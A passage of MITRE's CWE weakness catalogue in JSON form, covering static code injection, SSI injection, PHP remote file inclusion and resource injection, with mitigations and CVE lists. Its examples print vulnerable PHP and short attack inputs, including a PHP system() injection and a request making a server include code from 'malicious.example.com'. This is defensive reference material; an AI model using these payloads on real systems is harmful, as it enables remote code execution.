$_GET[\\"name\\"];$message = $_GET[\\"message\\"];$handle = fopen($MessageFile, \\"a+\\");fwrite($handle, \\"&lt;b&gt;$name&lt;/b&gt; says \'$message\'&lt;hr&gt;\\\\n\\");fclose($handle);echo \\"Message Saved!&lt;p&gt;\\\\n\\";","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","",""]},{"#text":"include($MessageFile);","attr":{"@_style":"margin-left:10px;"}}]}},{"attr":{"@_Nature":"attack"},"xhtml:div":{"#text":"name=h4x0rmessage=%3C?php%20system(%22/bin/ls%20-l%22);?%3E","xhtml:br":""}},{"attr":{"@_Nature":"attack"},"xhtml:div":"&lt;?php system(\\"/bin/ls -l\\");?&gt;"}],"Body_Text":["While the programmer intends for the MessageFile to only include data, an attacker can provide a message such as:","which will decode to the following:","The programmer thought they were just including the contents of a regular data file, but PHP parsed it and executed the code. Now, this code is executed any time people view messages.","Notice that XSS (CWE-79) is also possible in this situation."]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-0495","Description":"Perl code directly injected into CGI library file from parameters to another CGI program.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0495"},{"Reference":"CVE-2005-1876","Description":"Direct PHP code injection into supporting template file.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1876"},{"Reference":"CVE-2005-1894","Description":"Direct code injection into PHP script that can be accessed by attacker.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1894"},{"Reference":"CVE-2003-0395","Description":"PHP code from User-Agent HTTP header directly inserted into log file implemented as PHP script.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0395"},{"Reference":"CVE-2007-6652","Description":"chain: execution after redirect allows non-administrator to perform static code injection.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6652"}]},"Affected_Resources":{"Affected_Resource":"File or Directory"},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Direct Static Code Injection"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"35"}},{"attr":{"@_CAPEC_ID":"73"}},{"attr":{"@_CAPEC_ID":"77"}},{"attr":{"@_CAPEC_ID":"81"}},{"attr":{"@_CAPEC_ID":"85"}}]},"Notes":{"Note":{"#text":"\\"HTML injection\\" (see CWE-79: XSS) could be thought of as an example of this, but the code is injected and executed on the client side, not the server side. Server-Side Includes (SSI) are an example of direct static code injection.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Enabling_Factors_for_Exploitation, Other_Notes, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Affected_Resources, Applicable_Platforms, Causal_Nature, Demonstrative_Examples, Enabling_Factors_for_Exploitation, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}],"Previous_Entry_Name":[{"#text":"Direct Static Code Injection","attr":{"@_Date":"2008-04-11"}},{"#text":"Insufficient Control of Directives in Statically Saved Code (Static Code Injection)","attr":{"@_Date":"2009-05-27"}},{"#text":"Improper Sanitization of Directives in Statically Saved Code (\'Static Code Injection\')","attr":{"@_Date":"2010-04-05"}}]}},"97":{"attr":{"@_ID":"97","@_Name":"Improper Neutralization of Server-Side Includes (SSI) Within a Web Page","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software generates a web page, but does not neutralize or incorrectly neutralizes user-controllable input that could be interpreted as a server-side include (SSI) directive.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"96","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Code or Commands"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Server-Side Includes (SSI) Injection"},{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":36,"Entry_Name":"SSI Injection"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"101"}},{"attr":{"@_CAPEC_ID":"35"}}]},"Notes":{"Note":{"#text":"This can be resultant from XSS/HTML injection because the same special characters can be involved. However, this is server-side code execution, not client-side.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Other_Notes, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description, Name, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"}],"Previous_Entry_Name":[{"#text":"Server-Side Includes (SSI) Injection","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Sanitize Server-Side Includes (SSI) Within a Web Page","attr":{"@_Date":"2010-06-21"}}]}},"98":{"attr":{"@_ID":"98","@_Name":"Improper Control of Filename for Include/Require Statement in PHP Program (\'PHP Remote File Inclusion\')","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The PHP application receives input from an upstream component, but it does not restrict or incorrectly restricts the input before its usage in \\"require,\\" \\"include,\\" or similar functions.","Extended_Description":"In certain versions and configurations of PHP, this can allow an attacker to specify a URL to a remote location from which the software will obtain the code to execute. In other cases in association with path traversal, the attacker can specify a local file that may contain executable statements that can be parsed by PHP.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"706","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"829","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"94","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanAlsoBe","@_CWE_ID":"426","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"PHP","@_Prevalence":"Often"}}},"Alternate_Terms":{"Alternate_Term":[{"Term":"Remote file include"},{"Term":"RFI","Description":"The Remote File Inclusion (RFI) acronym is often used by vulnerability researchers."},{"Term":"Local file inclusion","Description":"This term is frequently used in cases in which remote download is disabled, or when the first part of the filename is not under the attacker\'s control, which forces use of relative path traversal (CWE-23) attack techniques to access files that may contain previously-injected PHP code, such as web access logs."}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."},{"Phase":"Architecture and Design"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":["Integrity","Confidentiality","Availability"],"Impact":"Execute Unauthorized Code or Commands","Note":"The attacker may be able to specify arbitrary code to be executed from a remote location. Alternatively, it may be possible to use normal program behavior to insert php code into files on the local machine which can then be included and force the code to execute since php ignores everything in the file except for the content between php specifiers."}},"Detection_Methods":{"Detection_Method":[{"Method":"Manual Analysis","Description":"Manual white-box analysis can be very effective for finding this issue, since there is typically a relatively small number of include or require statements in each program.","Effectiveness":"High"},{"Method":"Automated Static Analysis","Description":{"xhtml:p":["The external control or influence of filenames can often be detected using automated static analysis that models data flow within the software.","Automated static analysis might not be able to recognize when proper input validation is being performed, leading to false positives - i.e., warnings that do not have any security consequences or require any code changes. If the program uses a customized input validation library, then some tools may allow the analyst to create custom signatures to detect usage of those routines."]}}]},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-4"},"Phase":"Architecture and Design","Strategy":"Libraries or Frameworks","Description":"Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid."},{"attr":{"@_Mitigation_ID":"MIT-21.1"},"Phase":"Architecture and Design","Strategy":"Enforcement by Conversion","Description":{"xhtml:p":["When the set of acceptable objects, such as filenames or URLs, is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames or URLs, and reject all other inputs.","For example, ID 1 could map to \\"inbox.txt\\" and ID 2 could map to \\"profile.txt\\". Features such as the ESAPI AccessReferenceMap [REF-185] provide this capability."]}},{"attr":{"@_Mitigation_ID":"MIT-15"},"Phase":"Architecture and Design","Description":"For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server."},{"attr":{"@_Mitigation_ID":"MIT-22"},"Phase":["Architecture and Design","Operation"],"Strategy":"Sandbox or Jail","Description":{"xhtml:p":["Run the code in a \\"jail\\" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software.","OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows the software to specify restrictions on file operations.","This may not be a feasible solution, and it only limits the impact to the operating system; the rest of the application may still be subject to compromise.","Be careful to avoid CWE-243 and other weaknesses related to jails."]},"Effectiveness":"Limited","Effectiveness_Notes":"The effectiveness of this mitigation depends on the prevention capabilities of the specific sandbox or jail being used and might only help to reduce the scope of an attack, such as restricting the attacker to certain system calls or limiting the portion of the file system that can be accessed."},{"attr":{"@_Mitigation_ID":"MIT-17"},"Phase":["Architecture and Design","Operation"],"Strategy":"Environment Hardening","Description":"Run your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations."},{"attr":{"@_Mitigation_ID":"MIT-5.1"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.","When validating filenames, use stringent lists that limit the character set to be used. If feasible, only allow a single \\".\\" character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as \\"/\\" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434.","Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering \\"/\\" is insufficient protection if the filesystem also supports the use of \\"\\\\\\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if \\"../\\" sequences are removed from the \\".../...//\\" string in a sequential fashion, two instances of \\"../\\" would be removed from the original string, but the remaining characters would still form the \\"../\\" string."]},"Effectiveness":"High"},{"attr":{"@_Mitigation_ID":"MIT-34"},"Phase":["Architecture and Design","Operation"],"Strategy":"Attack Surface Reduction","Description":{"xhtml:p":["Store library, include, and utility files outside of the web document root, if possible. Otherwise, store them in a separate directory and use the web server\'s access control capabilities to prevent attackers from directly requesting them. One common practice is to define a fixed constant in each calling program, then check for the existence of the constant in the library/include file; if the constant does not exist, then the file was directly requested, and it can exit immediately.","This significantly reduces the chance of an attacker being able to bypass any protection mechanisms that are in the base program but not in the include files. It will also reduce the attack surface."]}},{"attr":{"@_Mitigation_ID":"MIT-6"},"Phase":["Architecture and Design","Implementation"],"Strategy":"Attack Surface Reduction","Description":{"xhtml:p":["Understand all the potential areas where untrusted inputs can enter your software: parameters or arguments, cookies, anything read from the network, environment variables, reverse DNS lookups, query results, request headers, URL components, e-mail, files, filenames, databases, and any external systems that provide data to the application. Remember that such inputs may be obtained indirectly through API calls.","Many file inclusion problems occur because the programmer assumed that certain inputs could not be modified, especially for cookies and URL components."]}},{"attr":{"@_Mitigation_ID":"MIT-29"},"Phase":"Operation","Strategy":"Firewall","Description":"Use an application firewall that can detect attacks against this weakness. It can be beneficial in cases in which the code cannot be fixed (because it is controlled by a third party), as an emergency prevention measure while more comprehensive software assurance measures are applied, or to provide defense in depth.","Effectiveness":"Moderate","Effectiveness_Notes":"An application firewall might not cover all possible input vectors. In addition, attack techniques might be available to bypass the protection mechanism, such as using malformed inputs that can still be processed by the component that receives those inputs. Depending on functionality, an application firewall might inadvertently reject or modify legitimate requests. Finally, some manual effort may be required for customization."},{"Phase":["Operation","Implementation"],"Strategy":"Environment Hardening","Description":"Develop and run your code in the most recent versions of PHP available, preferably PHP 6 or later. Many of the highly risky features in earlier PHP interpreters have been removed, restricted, or disabled by default."},{"attr":{"@_Mitigation_ID":"MIT-16"},"Phase":["Operation","Implementation"],"Strategy":"Environment Hardening","Description":{"xhtml:p":["When using PHP, configure the application so that it does not use register_globals. During implementation, develop the application so that it does not rely on this feature, but be wary of implementing a register_globals emulation that is subject to weaknesses such as CWE-95, CWE-621, and similar issues.","Often, programmers do not protect direct access to files intended only to be included by core programs. These include files may assume that critical variables have already been initialized by the calling program. As a result, the use of register_globals combined with the ability to directly access the include file may allow attackers to conduct file inclusion attacks. This remains an extremely common pattern as of 2009."]}},{"Phase":"Operation","Strategy":"Environment Hardening","Description":"Set allow_url_fopen to false, which limits the ability to include files from remote locations.","Effectiveness":"High","Effectiveness_Notes":"Be aware that some versions of PHP will still accept ftp:// and other URI schemes. In addition, this setting does not protect the code from path traversal attacks (CWE-22), which are frequently successful against the same vulnerable code that allows remote file inclusion."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following code, victim.php, attempts to include a function contained in a separate PHP page on the server. It builds the path to the file by using the supplied \'module_name\' parameter and appending the string \'/function.php\' to it.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"$dir = $_GET[\'module_name\'];include($dir . \\"/function.php\\");","xhtml:br":""}},{"attr":{"@_Nature":"attack"},"xhtml:div":"victim.php?module_name=http://malicious.example.com"},{"attr":{"@_Nature":"bad"},"xhtml:div":"system($_GET[\'cmd\']);"},{"attr":{"@_Nature":"attack"},"xhtml:div":"victim.php?module_name=http://malicious.example.com&amp;cmd=/bin/ls%20-l"},{"attr":{"@_Nature":"attack"},"xhtml:div":"/bin/ls -l"}],"Body_Text":["The problem with the above code is that the value of $dir is not restricted in any way, and a malicious user could manipulate the \'module_name\' parameter to force inclusion of an unanticipated file. For example, an attacker could request the above PHP page (example.php) with a \'module_name\' of \\"http://malicious.example.com\\" by using the following request string:","Upon receiving this request, the code would set \'module_name\' to the value \\"http://malicious.example.com\\" and would attempt to include http://malicious.example.com/function.php, along with any malicious code it contains.","For the sake of this example, assume that the malicious version of function.php looks like the following:","An attacker could now go a step further in our example and provide a request string as follows:","The code will attempt to include the malicious function.php file from the remote site. In turn, this file executes the command specified in the \'cmd\' parameter from the query string. The end result is an attempt by tvictim.php to execute the potentially malicious command, in this case:","Note that the above PHP example can be mitigated by setting allow_url_fopen to false, although this will not fully protect the code. See potential mitigations."]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2004-0285","Description":"Modification of assumed-immutable configuration variable in include file allows file inclusion via direct request.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0285"},{"Reference":"CVE-2004-0030","Description":"Modification of assumed-immutable configuration variable in include file allows file inclusion via direct request.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0030"},{"Reference":"CVE-2004-0068","Description":"Modification of assumed-immutable configuration variable in include file allows file inclusion via direct request.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0068"},{"Reference":"CVE-2005-2157","Description":"Modification of assumed-immutable configuration variable in include file allows file inclusion via direct request.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2157"},{"Reference":"CVE-2005-2162","Description":"Modification of assumed-immutable configuration variable in include file allows file inclusion via direct request.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2162"},{"Reference":"CVE-2005-2198","Description":"Modification of assumed-immutable configuration variable in include file allows file inclusion via direct request.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2198"},{"Reference":"CVE-2004-0128","Description":"Modification of assumed-immutable variable in configuration script leads to file inclusion.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0128"},{"Reference":"CVE-2005-1864","Description":"PHP file inclusion.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1864"},{"Reference":"CVE-2005-1869","Description":"PHP file inclusion.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1869"},{"Reference":"CVE-2005-1870","Description":"PHP file inclusion.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1870"},{"Reference":"CVE-2005-2154","Description":"PHP local file inclusion.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2154"},{"Reference":"CVE-2002-1704","Description":"PHP remote file include.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1704"},{"Reference":"CVE-2002-1707","Description":"PHP remote file include.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1707"},{"Reference":"CVE-2005-1964","Description":"PHP remote file include.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1964"},{"Reference":"CVE-2005-1681","Description":"PHP remote file include.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1681"},{"Reference":"CVE-2005-2086","Description":"PHP remote file include.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2086"},{"Reference":"CVE-2004-0127","Description":"Directory traversal vulnerability in PHP include statement.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0127"},{"Reference":"CVE-2005-1971","Description":"Directory traversal vulnerability in PHP include statement.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1971"},{"Reference":"CVE-2005-3335","Description":"PHP file inclusion issue, both remote and local; local include uses \\"..\\" and \\"%00\\" characters as a manipulation, but many remote file inclusion issues probably have this vector.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3335"},{"Reference":"CVE-2009-1936","Description":"chain: library file sends a redirect if it is directly requested but continues to execute, allowing remote file inclusion and path traversal.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1936"}]},"Affected_Resources":{"Affected_Resource":"File or Directory"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"PHP File Include"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2007"},"Entry_ID":"A3","Entry_Name":"Malicious File Execution","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":5,"Entry_Name":"Remote File Inclusion"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"193"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-185"}},{"attr":{"@_External_Reference_ID":"REF-76"}},{"attr":{"@_External_Reference_ID":"REF-951"}},{"attr":{"@_External_Reference_ID":"REF-952"}},{"attr":{"@_External_Reference_ID":"REF-953"}}]},"Notes":{"Note":[{"attr":{"@_Type":"Relationship"},"xhtml:p":["This is frequently a functional consequence of other weaknesses. It is usually multi-factor with other factors (e.g. MAID), although not all inclusion bugs involve assumed-immutable data. Direct request weaknesses frequently play a role.","Can overlap directory traversal in local inclusion problems."]},{"#text":"Under-researched and under-reported. Other interpreted languages with \\"require\\" and \\"include\\" functionality could also product vulnerable applications, but as of 2007, PHP has been the focus. Any web-accessible language that uses executable file extensions is likely to have this type of issue, such as ASP, since .asp extensions are typically executable. Languages such as Perl are less likely to exhibit these problems because the .pl extension isn\'t always configured to be executable by the web server.","attr":{"@_Type":"Research Gap"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Relationship_Notes, Research_Gaps, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Alternate_Terms, Applicable_Platforms, Demonstrative_Examples, Likelihood_of_Exploit, Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Importance":"Critical","Modification_Comment":"converted from Compound_Element to Weakness"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Alternate_Terms, Common_Consequences, Detection_Factors, Potential_Mitigations, References, Related_Attack_Patterns, Relationships, Taxonomy_Mappings, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Alternate_Terms, Name, Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Affected_Resources, Demonstrative_Examples, Likelihood_of_Exploit, Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"PHP File Inclusion","attr":{"@_Date":"2008-04-11"}},{"#text":"Insufficient Control of Filename for Include/Require Statement in PHP Program (aka \'PHP File Inclusion\')","attr":{"@_Date":"2009-05-27"}},{"#text":"Improper Control of Filename for Include/Require Statement in PHP Program (\'PHP File Inclusion\')","attr":{"@_Date":"2013-02-21"}}]}},"99":{"attr":{"@_ID":"99","@_Name":"Improper Control of Resource Identifiers (\'Resource Injection\')","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software receives input from an upstream component, but it does not restrict or incorrectly restricts the input before it is used as an identifier for a resource that may be outside the intended sphere of control.","Extended_Description":{"xhtml:p":["A resource injection issue occurs when the following two conditions are met:","This may enable an attacker to access or modify otherwise protected system resources."],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ol":{"xhtml:li":["An attacker can specify the identifier used to access a system resource. For example, an attacker might be able to specify part of the name of a file to be opened or a port number to be used.","By specifying the resource, the attacker gains a capability that would not otherwise be permitted. For example, the program may give the attacker the ability to overwrite the specified file, run with a configuration controlled by the attacker, or transmit sensitive information to a third-party server."]}}},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"74","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"706","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanAlsoBe","@_CWE_ID":"73","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":{"Term":"Insecure Direct Object Reference","Description":"OWASP uses this term, although it is effectively the same as resource injection."}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Application Data","Modify Application Data","Read Files or Directories","Modify Files or Directories"],"Note":"An attacker could gain access to or modify sensitive data or system resources. This could allow access to protected files or directories including configuration files and files containing sensitive information."}},"Potential_Mitigations":{"Mitigation":{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input 